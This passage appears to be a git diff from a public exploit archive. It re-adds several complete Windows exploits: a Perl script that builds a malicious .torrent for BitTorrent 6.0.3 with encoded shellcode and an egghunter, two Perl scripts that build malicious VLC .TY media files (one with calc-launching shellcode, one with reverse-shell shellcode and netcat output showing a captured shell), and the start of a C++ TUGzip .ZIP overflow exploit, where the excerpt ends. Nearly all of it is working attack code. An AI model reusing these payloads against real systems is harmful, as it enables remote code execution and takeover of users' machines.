-"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
-"\x6A\x5E\x6A\x56\x4C\x5E\x21\x21\x46\x16\xFB\x6A\x68\x01\x55\x5B".
-"\xAD\x44\x44\x4E\x4E\x4E\x81\x01\xEF\x59\x51";
-}
-
-my $stack_buffer	= $ret x 192 . get_eip() . venetian_decoder();
-
-open(HANDLE, "> torrent.torrent") || die "Error!\n\n";
-print HANDLE	"d8:announce17:http://qwerty.qwe7:comment" 	. 
-		length($shellcode) .":" 			. 
-		$shellcode .
-		"10:created by" 				.
-		length($stack_buffer) . ":"			.
-		$stack_buffer					.
-		"13:creation datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:piece lengthi65536e6:pieces20:".	
-		"\x86\xf7\xe4\x37\xfa\xa5\xa7\xfc\xe1\x5d\x1d\xdc\xb9\xea\xea\xea\x37\x76\x67\xb8\x65\x65\x0a";
-close (HANDLE);
-
-# milw0rm.com [2008-10-19]
+#!/usr/bin/perl
+# BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit
+# 09/21/2008 by  k`sOSe && oVeret
+
+use warnings;
+use strict;
+
+# If you change this(avoid \x80->\x9f unless you really know what you are doing) you must also change the length value of the decoder
+my $shellcode =  
+#  windows/exec CMD="C:\WINDOWS\system32\calc.exe"  
+#[*] x86/alpha_mixed succeeded, final size 337                                                                                  
+"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
+"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41" .
+"\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41" .
+"\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4b\x58\x51" .
+"\x54\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47\x4c\x4c" .
+"\x4b\x43\x4c\x45\x55\x44\x38\x43\x31\x4a\x4f\x4c\x4b\x50" .
+"\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51" .
+"\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49" .
+"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x43\x37\x49" .
+"\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47" .
+"\x4b\x50\x54\x47\x54\x43\x34\x43\x45\x4d\x35\x4c\x4b\x51" .
+"\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50" .
+"\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45" .
+"\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x46\x44\x45" .
+"\x54\x48\x43\x51\x4f\x46\x51\x4b\x46\x45\x30\x46\x36\x45" .
+"\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c" .
+"\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x45\x58\x4d" .
+"\x59\x4b\x48\x4d\x53\x49\x50\x42\x4a\x50\x50\x45\x38\x4a" .
+"\x50\x4c\x4a\x43\x34\x51\x4f\x45\x38\x4c\x58\x4b\x4e\x4c" .
+"\x4a\x44\x4e\x50\x57\x4b\x4f\x4a\x47\x50\x43\x46\x5a\x51" .
+"\x4c\x46\x37\x50\x49\x50\x4e\x51\x54\x50\x4f\x50\x57\x50" .
+"\x53\x51\x4c\x42\x53\x43\x49\x44\x33\x44\x34\x45\x35\x42" .
+"\x4d\x50\x33\x46\x52\x51\x4c\x42\x43\x43\x51\x42\x4c\x45" .
+"\x33\x46\x4e\x43\x55\x42\x58\x42\x45\x43\x30\x44\x4a\x41" .
+"\x41";
+
+$shellcode .= "\x87\x87"; # -> \x21\x20\x21\x20 -> EGG ( for english windows version )
+
+my $ret	= "\x3f\x41"; # -> unicode friendly pop,pop,ret
+
+# unicode friendly get_EIP (needed by the venetian decoder)
+sub get_eip
+{
+	#0041 00          ADD BYTE PTR DS:[ECX],AL
+	#5F               POP EDI
+	#0041 00          ADD BYTE PTR DS:[ECX],AL
+	#5F               POP EDI
+	#0041 00          ADD BYTE PTR DS:[ECX],AL
+	#6A 00            PUSH 0
+	#58               POP EAX
+	#0041 00          ADD BYTE PTR DS:[ECX],AL
+	#57               PUSH EDI
+	#0041 00          ADD BYTE PTR DS:[ECX],AL
+	#54               PUSH ESP
+	#0041 00          ADD BYTE PTR DS:[ECX],AL
+	#5A               POP EDX
+	#0042 00          ADD BYTE PTR DS:[EDX],AL
+	#40               INC EAX
+	#0042 00          ADD BYTE PTR DS:[EDX],AL
+	#40               INC EAX
+	#0042 00          ADD BYTE PTR DS:[EDX],AL
+	#40               INC EAX
+	#0042 00          ADD BYTE PTR DS:[EDX],AL
+	#40               INC EAX
+	#0042 00          ADD BYTE PTR DS:[EDX],AL
+	#40               INC EAX
+	#0042 00          ADD BYTE PTR DS:[EDX],AL
+	#40               INC EAX
+	#0042 00          ADD BYTE PTR DS:[EDX],AL
+	#40               INC EAX
+	#0042 00          ADD BYTE PTR DS:[EDX],AL
+	#40               INC EAX
+	#0042 00          ADD BYTE PTR DS:[EDX],AL
+	#40               INC EAX
+	#0042 00          ADD BYTE PTR DS:[EDX],AL
+	#40               INC EAX
+	#0042 00          ADD BYTE PTR DS:[EDX],AL
+	#40               INC EAX
+	#0042 00          ADD BYTE PTR DS:[EDX],AL
+	#40               INC EAX
+	#0042 00          ADD BYTE PTR DS:[EDX],AL
+	#43               INC EBX
+	#0042 00          ADD BYTE PTR DS:[EDX],AL
+	#58               POP EAX
+	#0041 00          ADD BYTE PTR DS:[ECX],AL
+	"\x5f\x41\x5f\x41\x6a\x58\x41\x57\x41\x54\x41\x5a" . "\x42\x40" x 12 . "\x42\x43" . "\x42\x58\x41";
+}
+
+
+sub egghunter
+{
+	#6A01		PUSH 1
+	#5E		POP ESI
+	#4E		DEC ESI (=0)
+	#6A72		PUSH 72				<- starts from 0x00720000
+	#56		PUSH ESI
+	#4C		DEC ESP
+	#4C		DEC ESP
+	#5E		POP ESI
+	#5E		POP ESI				<- ESI == 0x00720000
+	#BA21202120	/MOV EDX,20212021		<- egg
+	#46		|INC ESI
+	#3B16		|CMP EDX,DWORD PTR DS:[ESI]
+	#75FB		\JNZ SHORT egghunter
+	"\x6A\x01\x5E\x4E\x6A\x72\x56\x4C\x4C\x5E\x5E\xBA\x21\x20\x21\x20\x46\x3B\x16\x75\xFB";
+}
+
+# this will decode the unicode expanded shellcode pushing it to the stack and the execute it
+sub decoder
+{
+	#46		INC ESI
+	#6A01		PUSH 1
+	#6801010155	PUSH 0x55010101
+	#4C		DEC ESP
+	#5B		POP EBX
+	#5B		POP EBX
+	#AD		/LODS DWORD PTR DS:[ESI]
+	#50		|PUSH EAX
+	#44		|INC ESP
+	#44		|INC ESP
+	#44		|INC ESP
+	#4E		|DEC ESI
+	#4E		|DEC ESI
+	#4E		|DEC ESI
+	#4E		|DEC ESI
+	#4E		|DEC ESI
+	#4E		|DEC ESI
+	#4B		|DEC EBX
+	#83FB01		|CMP EBX,1
+	#75EF		\JNE SHORT decoder
+	#54		PUSH ESP
+	#59		POP ECX
+	#4C		DEC ESP		-> realign
+	#51		PUSH ECX
+	#C3		RET
+"\x46\x6A\x01\x68\x01\x01\x01\x55\x4C\x5B\x5B\xAD\x50\x44\x44\x44\x4E\x4E\x4E\x4E\x4E\x4E\x4B\x83\xFB\x01\x75\xEF\x54\x59\x4c\x51\xc3";
+}
+
+# venetian deccoder + venetian encoded egghunter and decoder
+sub venetian_decoder
+{
+"\x05\x03\x01\x71\x2D\x01\x01\x71\x40\x71\xC6\x01\x71\x40\x71\x40".
+"\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x72\x71\x40\x71\x40\x71\xC6".
+"\x4C\x71\x40\x71\x40\x71\xC6\x5E\x71\x40\x71\x40\x71\xC6\xBA\x71".
+"\x40\x71\x40\x71\xC6\x20\x71\x40\x71\x40\x71\xC6\x20\x71\x40\x71".
+"\x40\x71\xC6\x3B\x71\x40\x71\x40\x71\xC6\x75\x71\x40\x71\x40\x71".
+"\xC6\x46\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x01".
+"\x71\x40\x71\x40\x71\xC6\x01\x71\x40\x71\x40\x71\xC6\x4C\x71\x40".
+"\x71\x40\x71\xC6\x5B\x71\x40\x71\x40\x71\xC6\x50\x71\x40\x71\x40".
+"\x71\xC6\x44\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6".
+"\x4E\x71\x40\x71\x40\x71\xC6\x4E\x71\x40\x71\x40\x71\xC6\x4B\x71".
+"\x40\x71\xFE\xFE\x40\x71\xC6\xFB\x71\x40\x71\x40\x71\xC6\x75\x71".
+"\x40\x71\x40\x71\xC6\x54\x71\x40\x71\x40\x71\xC6\x4C\x71\x40\x71".
+"\x40\x71\xC6\xC3\x71\x40\x71\x04\x04\x04\x04\x04\x04\x04\x04\x04".
+"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
+"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
+"\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04\x04".
+"\x6A\x5E\x6A\x56\x4C\x5E\x21\x21\x46\x16\xFB\x6A\x68\x01\x55\x5B".
+"\xAD\x44\x44\x4E\x4E\x4E\x81\x01\xEF\x59\x51";
+}
+
+my $stack_buffer	= $ret x 192 . get_eip() . venetian_decoder();
+
+open(HANDLE, "> torrent.torrent") || die "Error!\n\n";
+print HANDLE	"d8:announce17:http://qwerty.qwe7:comment" 	. 
+		length($shellcode) .":" 			. 
+		$shellcode .
+		"10:created by" 				.
+		length($stack_buffer) . ":"			.
+		$stack_buffer					.
+		"13:creation datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:piece lengthi65536e6:pieces20:".	
+		"\x86\xf7\xe4\x37\xfa\xa5\xa7\xfc\xe1\x5d\x1d\xdc\xb9\xea\xea\xea\x37\x76\x67\xb8\x65\x65\x0a";
+close (HANDLE);
+
+# milw0rm.com [2008-10-19]
diff --git a/platforms/windows/local/6798.pl b/platforms/windows/local/6798.pl
index fe0071cf1..1dc41fad0 100755
--- a/platforms/windows/local/6798.pl
+++ b/platforms/windows/local/6798.pl
@@ -1,72 +1,72 @@
-#!/usr/bin/perl
-# 10/21/2008 k`sOSe
-
-use warnings;
-use strict;
-
-# windows/exec - 141 bytes
-# http://www.metasploit.com
-my $shellcode =
-"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" .
-"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
-"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" .
-"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" .
-"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" .
-"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" .
-"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" .
-"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" .
-"\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73" .
-"\x74\x65\x6d\x33\x32\x5c\x63\x61\x6c\x63\x2e\x65\x78\x65" .
-"\x00";
-
-usage() if(!defined(@ARGV) or scalar(@ARGV) < 1 or $ARGV[0] !~ /^\d$/ or $ARGV[0] > 1);
-
-my @targets = ( 
-			"\x24\x11\x62\x77", # jmp esp @ shell32.dll - Win XP SP1 
-			"\xb3\x57\x04\x7d"  # jmp esp @ shell32.dll - Win XP SP2
-		);
-
-my $junk = "\x41";
-
-open(my $file, "> evil.mpg");
-print $file	"\xF5\x46\x7A\xBD" .	# TIVO_PES_FILEID    
-		"\x00\x00\x00\x02" .	
-		"\x00\x02\x00\x00" . 	# CHUNK_SIZE    
-		$junk x 8 .
-		"\x00\x00\x05\x41" .	# i_map_size
-		$junk x 4 .
-		"\x00\x00\x05\x49" .	# SEQ table size / (i_map_size + 8) == 1
-		$junk x 60	.
-		$targets[$ARGV[0]] .
-		$shellcode .
-		$junk x 130835	.
-		"\x05" .		# i_num_recs
-		$junk x 3 .	
-		"\x05" .		# p_hdrs
-		$junk x 1 .
-		"\x09" .		# subrec_type \ 
-					#		(subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo)
-		"\xc0" .		# rec_type    /
-		$junk x 14 .
-		"\x06" .		# subrec_type \
-					#            	(subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo
-		"\xe0" . 		# rec_type    /
-		$junk x 531062;
-
-
-sub usage
-{
-	print <
-
-targets:
-	0 - Windows XP SP1
-	1 - Windows XP SP2
-EOM
-exit;
-}
-
-# milw0rm.com [2008-10-21]
+#!/usr/bin/perl
+# 10/21/2008 k`sOSe
+
+use warnings;
+use strict;
+
+# windows/exec - 141 bytes
+# http://www.metasploit.com
+my $shellcode =
+"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" .
+"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" .
+"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" .
+"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" .
+"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" .
+"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" .
+"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" .
+"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" .
+"\x43\x3a\x5c\x57\x49\x4e\x44\x4f\x57\x53\x5c\x73\x79\x73" .
+"\x74\x65\x6d\x33\x32\x5c\x63\x61\x6c\x63\x2e\x65\x78\x65" .
+"\x00";
+
+usage() if(!defined(@ARGV) or scalar(@ARGV) < 1 or $ARGV[0] !~ /^\d$/ or $ARGV[0] > 1);
+
+my @targets = ( 
+			"\x24\x11\x62\x77", # jmp esp @ shell32.dll - Win XP SP1 
+			"\xb3\x57\x04\x7d"  # jmp esp @ shell32.dll - Win XP SP2
+		);
+
+my $junk = "\x41";
+
+open(my $file, "> evil.mpg");
+print $file	"\xF5\x46\x7A\xBD" .	# TIVO_PES_FILEID    
+		"\x00\x00\x00\x02" .	
+		"\x00\x02\x00\x00" . 	# CHUNK_SIZE    
+		$junk x 8 .
+		"\x00\x00\x05\x41" .	# i_map_size
+		$junk x 4 .
+		"\x00\x00\x05\x49" .	# SEQ table size / (i_map_size + 8) == 1
+		$junk x 60	.
+		$targets[$ARGV[0]] .
+		$shellcode .
+		$junk x 130835	.
+		"\x05" .		# i_num_recs
+		$junk x 3 .	
+		"\x05" .		# p_hdrs
+		$junk x 1 .
+		"\x09" .		# subrec_type \ 
+					#		(subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo)
+		"\xc0" .		# rec_type    /
+		$junk x 14 .
+		"\x06" .		# subrec_type \
+					#            	(subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo
+		"\xe0" . 		# rec_type    /
+		$junk x 531062;
+
+
+sub usage
+{
+	print <
+
+targets:
+	0 - Windows XP SP1
+	1 - Windows XP SP2
+EOM
+exit;
+}
+
+# milw0rm.com [2008-10-21]
diff --git a/platforms/windows/local/6825.pl b/platforms/windows/local/6825.pl
index 1261414d8..cdf65dc74 100755
--- a/platforms/windows/local/6825.pl
+++ b/platforms/windows/local/6825.pl
@@ -1,90 +1,90 @@
-#!/usr/bin/perl
-# 10/23/2008 k`sOSe
-# Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit
-# 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k)
-# 2 - Works both with a local file and with a remote url
-# 3 - VLC do not crash!
-# 4 - Enjoy a respawing shell, even if VLC will be closed!
-#
-# bUGGEd htdocs # nc -l -p 443
-# Microsoft Windows XP [Version 5.1.2600]
-# (C) Copyright 1985-2001 Microsoft Corp.
-#
-# e:\Program Files\VideoLAN\VLC>exit
-# exit
-# bUGGEd htdocs # nc -l -p 443
-# Microsoft Windows XP [Version 5.1.2600]
-# (C) Copyright 1985-2001 Microsoft Corp.
-#
-# e:\Program Files\VideoLAN\VLC>exit
-# exit
-# bUGGEd htdocs # nc -l -p 443
-# Microsoft Windows XP [Version 5.1.2600]
-# (C) Copyright 1985-2001 Microsoft Corp.
-#
-# e:\Program Files\VideoLAN\VLC>
-
-use warnings;
-use strict;
-
-# windows/exec - 141 bytes
-# http://www.metasploit.com
-my $shellcode =
-# windows/shell_reverse_tcp - 287 bytes
-# http://www.metasploit.com
-# EXITFUNC=seh, LPORT=443, LHOST=127.0.0.1
- "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24" .
- "\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f" .
- "\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84" .
- "\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28" .
- "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c" .
- "\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" .
- "\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e" .
- "\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" .
- "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50" .
- "\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff" .
- "\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43" .
- "\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66\x68\x01\xbb" .
- "\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff\xd6\x6a" .
- "\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a\x50" .
- "\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95" .
- "\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" .
- "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51" .
- "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" .
- "\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6" .
- "\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a" .
- "\x04\x5f\x53\xff\xd6\xff\xd0";
-
-my $junk = "\x41";
-
-open(my $file, "> evil.mpg");
-print $file	"\xF5\x46\x7A\xBD" .	# TIVO_PES_FILEID    
-		"\x00\x00\x00\x02" .	
-		"\x00\x02\x00\x00" . 	# CHUNK_SIZE    
-		$junk x 8 .
-		"\x00\x00\x05\x41" .	# i_map_size
-		$junk x 4 .
-		"\x00\x00\x05\x49" .	# SEQ table size / (i_map_size + 8) == 1
-		$junk x 60	.
-		"\xb3\x57\x04\x7d"  .	# jmp esp for winxp sp2.. if it fails SEH will be triggered
-		$shellcode .
-		$shellcode .
-		$junk x (733 - length($shellcode)) .
-		"\xeb\x06\x90\x90" .	# jump ahead
-		"\x13\x12\x54\x6a" .	# pop,pop,ret @ libvlc 0.9.4
-		"\xe9\x16\xfd\xff\xff". # jump back
-		$junk x 129943	.
-		"\x05" .		# i_num_recs
-		$junk x 3 .	
-		"\x05" .		# p_hdrs
-		$junk x 1 .
-		"\x09" .		# subrec_type \ 
-					#		(subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo)
-		"\xc0" .		# rec_type    /
-		$junk x 14 .
-		"\x06" .		# subrec_type \
-					#            	(subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo
-		"\xe0" . 		# rec_type    /
-		$junk x 531062;
-
-# milw0rm.com [2008-10-23]
+#!/usr/bin/perl
+# 10/23/2008 k`sOSe
+# Rewritten VLC 0.9.4 .TY File Buffer Overflow Exploit
+# 1 - Works on Windows XP SP1, SP2, SP3 (and probably win2k)
+# 2 - Works both with a local file and with a remote url
+# 3 - VLC do not crash!
+# 4 - Enjoy a respawing shell, even if VLC will be closed!
+#
+# bUGGEd htdocs # nc -l -p 443
+# Microsoft Windows XP [Version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+#
+# e:\Program Files\VideoLAN\VLC>exit
+# exit
+# bUGGEd htdocs # nc -l -p 443
+# Microsoft Windows XP [Version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+#
+# e:\Program Files\VideoLAN\VLC>exit
+# exit
+# bUGGEd htdocs # nc -l -p 443
+# Microsoft Windows XP [Version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+#
+# e:\Program Files\VideoLAN\VLC>
+
+use warnings;
+use strict;
+
+# windows/exec - 141 bytes
+# http://www.metasploit.com
+my $shellcode =
+# windows/shell_reverse_tcp - 287 bytes
+# http://www.metasploit.com
+# EXITFUNC=seh, LPORT=443, LHOST=127.0.0.1
+ "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24" .
+ "\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f" .
+ "\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84" .
+ "\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28" .
+ "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c" .
+ "\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64" .
+ "\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x5e" .
+ "\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" .
+ "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50" .
+ "\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff" .
+ "\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43" .
+ "\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66\x68\x01\xbb" .
+ "\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff\xd6\x6a" .
+ "\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a\x50" .
+ "\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95" .
+ "\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab" .
+ "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51" .
+ "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05" .
+ "\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6" .
+ "\x79\xff\x75\x04\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a" .
+ "\x04\x5f\x53\xff\xd6\xff\xd0";
+
+my $junk = "\x41";
+
+open(my $file, "> evil.mpg");
+print $file	"\xF5\x46\x7A\xBD" .	# TIVO_PES_FILEID    
+		"\x00\x00\x00\x02" .	
+		"\x00\x02\x00\x00" . 	# CHUNK_SIZE    
+		$junk x 8 .
+		"\x00\x00\x05\x41" .	# i_map_size
+		$junk x 4 .
+		"\x00\x00\x05\x49" .	# SEQ table size / (i_map_size + 8) == 1
+		$junk x 60	.
+		"\xb3\x57\x04\x7d"  .	# jmp esp for winxp sp2.. if it fails SEH will be triggered
+		$shellcode .
+		$shellcode .
+		$junk x (733 - length($shellcode)) .
+		"\xeb\x06\x90\x90" .	# jump ahead
+		"\x13\x12\x54\x6a" .	# pop,pop,ret @ libvlc 0.9.4
+		"\xe9\x16\xfd\xff\xff". # jump back
+		$junk x 129943	.
+		"\x05" .		# i_num_recs
+		$junk x 3 .	
+		"\x05" .		# p_hdrs
+		$junk x 1 .
+		"\x09" .		# subrec_type \ 
+					#		(subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo)
+		"\xc0" .		# rec_type    /
+		$junk x 14 .
+		"\x06" .		# subrec_type \
+					#            	(subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo
+		"\xe0" . 		# rec_type    /
+		$junk x 531062;
+
+# milw0rm.com [2008-10-23]
diff --git a/platforms/windows/local/6831.cpp b/platforms/windows/local/6831.cpp
index 74d5302eb..cd24dde98 100755
--- a/platforms/windows/local/6831.cpp
+++ b/platforms/windows/local/6831.cpp
@@ -1,419 +1,419 @@
-/*0day TUGzip 3.00 archiver .ZIP File Local Buffer Overflow
- "If you change things ,forever,there's no going back,you see for them you're just a freak, like me ..Mhaaaahaaaaaaaaaaaaaaaaaaaa"(JK)
-  Well hello there ,greetz from Romania,here is a exploit for the archiver TUGzip.
-  So the payload doesen't always execute,it's just a matter of patience,from 10 
-  attemps you get success on 2 in the best case.Got 3 more archivers with stack
-  overflow and heap overflow,I'm bored... I'm looking for a new approach,will see
-  soon what I'm going to bring you.
-  "Let's put a smile on that face Mhaaaaaaaaahhaaahaaahhhhhhaaaaaaaaaaaaaaaaaa"
-  Credits go to Stefan Marin or fl0 fl0w :) .
-    All the best !
-  
-Registers
-EAX 00000000
-ECX 00000064
-EDX 0013F6D0
-EBX 0117ABDC
-ESP 0013F6D0
-EBP 45444342
-ESI 0117AF6C
-EDI 00D88B1C
-EIP 58585858
-
-SEH chain of main thread, item 0
- Address=0013F6D0
- SE handler=C9C9C9C9
-
-*/
-#include
-#include
-#include
-#include
-
-#define OFFSET 2504
-#define NOP 2515    
-#define shellcode_offset 2535
-
-
-char file_1[]=
-  "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x08\x00\x00\x32\x32"
-"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
-"\x66\x66\x64\x73\x75\x69\x62\x7A\x65\x6F\x69\x76\x7A\x20\x66\x68"
-"\x65\x6F\x20\x79\x66\x6F\x7A\x69\x61\x71\x20\x6F\x69\x65\x61\x7A"
-"\x75\x20\x7A\x71\x6F\x66\x68\x75\x65\x7A\x71\x6F\x69\x65\x6E\x66"
-"\x65\x7A\x6A\x75\x71\x63\x62\x75\x71\x70\x7A\x61\x7A\x69\x27\x74"
-"\x75\x72\x65\x6F\x7A\x6E\x62\x69\x6A\x75\x76\x62\x67\x73\x64\x75"
-"\x69\x71\x79\x72\x7A\x61\x6A\x20\x62\x63\x73\x64\x6F\x70\x69\x75"
-"\x72\x79\x7A\x6F\x65\x61\x71\x6E\x62\x69\x6F\x64\x73\x79\x72\x66"
-"\x65\x7A\x71\x6F\x69\x70\x62\x75\x66\x63\x73\x71\x69\x75\x79\x72"
-"\x61\x7A\x62\x69\x6A\x65\x66\x62\x68\x73\x75\x69\x71\x76\x64\x73"
-"\x71\x69\x6A\x62\x66\x65\x7A\x71\x75\x61\x66\x64\x64\x64\x64\x64"
-"\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x64\x68\x68"
-"\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x68\x75\x75\x75"
-"\x75\x75\x75\x75\x75\x75\x75\x75\x68\x76\x71\x24\x69\x66\x72\x7A"
-"\x65\x6F\x62\x76\x69\x6F\x7A\x65\x71\x66\x74\x72\x65\x6F\x7A\x71"
-"\x6A\x6E\x62\x76\x64\x73\x70\x69\x79\x75\x66\x71\x6F\x65\x69\x68"
-"\x66\x72\x6F\x75\x65\x7A\x68\x61\x72\x62\x20\x69\x76\x66\x64\x73"
-"\x70\x6F\x68\x6A\x72\x65\x71\x6F\x75\x68\x66\x7A\x65\x61\x71\x75"
-"\x68\x76\x71\x6F\x75\x68\x65\x66\x6F\x71\x73\x69\x6A\x68\x64\x6F"
-"\x73\x71\x68\x76\x64\x6F\x69\x68\x7A\x61\x71\x6F\x65\x69\x68\x66"
-"\x64\x73\x6F\x69\x75\x68\x76\x63\x78\x77\x69\x75\x68\x66\x71\x6F"
-"\x75\x69\x68\x76\x77\x78\x6F\x69\x68\x66\x64\x73\x71\x6F\x69\x68"
